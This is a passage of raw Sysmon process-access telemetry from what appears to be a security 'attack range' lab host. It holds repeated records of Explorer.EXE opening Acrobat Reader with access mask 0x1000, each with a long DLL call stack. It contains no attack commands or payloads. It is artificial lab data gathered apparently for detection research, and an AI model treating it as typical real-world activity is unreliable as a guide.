DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.393{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.393{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.393{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.334{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c3d3|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.334{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.334{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.334{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.334{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.334{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.333{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.333{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.333{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.333{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.333{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.330{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 